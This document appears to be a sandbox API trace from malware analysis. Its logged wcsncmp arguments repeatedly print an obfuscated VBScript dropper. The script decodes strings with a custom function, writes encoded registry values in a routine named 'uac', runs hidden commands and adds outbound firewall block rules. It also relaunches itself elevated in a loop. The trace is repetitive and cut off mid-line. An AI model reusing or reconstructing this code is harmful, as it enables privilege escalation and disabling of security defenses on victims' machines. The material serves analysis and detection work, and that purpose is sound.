bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 30 [0226.305] wcsncmp (_String1=" chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.305] wcsncmp (_String1="chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 86 [0226.305] wcsncmp (_String1="hr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 91 [0226.305] wcsncmp (_String1="r((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 101 [0226.305] wcsncmp (_String1="((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = 